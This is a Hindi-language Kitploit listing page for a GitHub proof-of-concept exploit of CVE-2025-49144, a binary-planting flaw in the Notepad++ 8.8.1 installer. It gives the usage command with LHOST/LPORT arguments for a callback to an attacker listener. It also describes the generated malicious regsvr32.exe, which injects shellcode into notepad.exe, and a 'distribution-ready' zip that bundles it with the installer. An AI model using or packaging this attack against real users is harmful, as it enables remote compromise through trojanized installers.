Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Notepad-8.8.1_CVE-2025-49144 — अवधारणा प्रमाण (PoC) जो Notepad++ 8.8.1 इंस्टॉलर में CVE-2025-49144 भेद्यता का शोषण करता है। | Kitploit
उपकरण/GitHubGitHub/b0ysie7e/notepad-8.8.1_cve-2025-49144
पेलोड जनरेशनशोषणशेलकोडपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubb0ysie7e/notepad-8.8.1_cve-2025-49144

Notepad-8.8.1_CVE-2025-49144

अवधारणा प्रमाण (PoC) जो Notepad++ 8.8.1 इंस्टॉलर में CVE-2025-49144 भेद्यता का शोषण करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
611 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-49144 – Notepad++ 8.8.1 के लिए एक्सप्लॉइट

इस रिपॉजिटरी में एक कार्यात्मक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है जो Notepad++ 8.8.1 इंस्टॉलर में CVE-2025-49144 भेद्यता का शोषण करता है। दुर्भावनापूर्ण निष्पादन एक बाइनरी (regsvr32.exe) को असुरक्षित इंस्टॉलर के समान निर्देशिका में रखकर होता है। जब इंस्टॉलर निष्पादित होता है, तो यह संदर्भ प्राप्त करता है और पेलोड को ट्रिगर करता है।

⚠️ अस्वीकरण
यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम पर अनधिकृत उपयोग कानून का उल्लंघन हो सकता है।
लेखक इस उपकरण से जुड़े किसी भी दुरुपयोग या दुर्भावनापूर्ण गतिविधि के लिए जिम्मेदार नहीं है।


🧪 आवश्यकताएँ

  • Python 3.x
  • msfvenom (Metasploit Framework का भाग)
  • mingw-w64 (x86_64-w64-mingw32-gcc)
  • असुरक्षित इंस्टॉलर: npp.8.8.1.Installer.x64.exe (मैन्युअल रूप से उसी निर्देशिका में रखा जाना चाहिए)

⚙️ उपयोग

root@kitploit:~
python3 exploit.py -i <LHOST> -p <LPORT>

उदाहरण:

root@kitploit:~
python3 exploit.py -i 192.168.100.10 -p 4444

इससे निम्नलिखित फ़ाइलें उत्पन्न होंगी:

  • regsvr32.exe: वह निष्पादन योग्य फ़ाइल जो दूरस्थ notepad.exe प्रक्रिया में शेलकोड इंजेक्ट करती है।
  • notepad_payload.zip: वितरण-तैयार संग्रह जिसमें शामिल है:
    • npp.8.8.1.Installer.x64.exe
    • regsvr32.exe

🎬 डेमो

[डेमो पूर्वावलोकन]

टूल डाउनलोड करें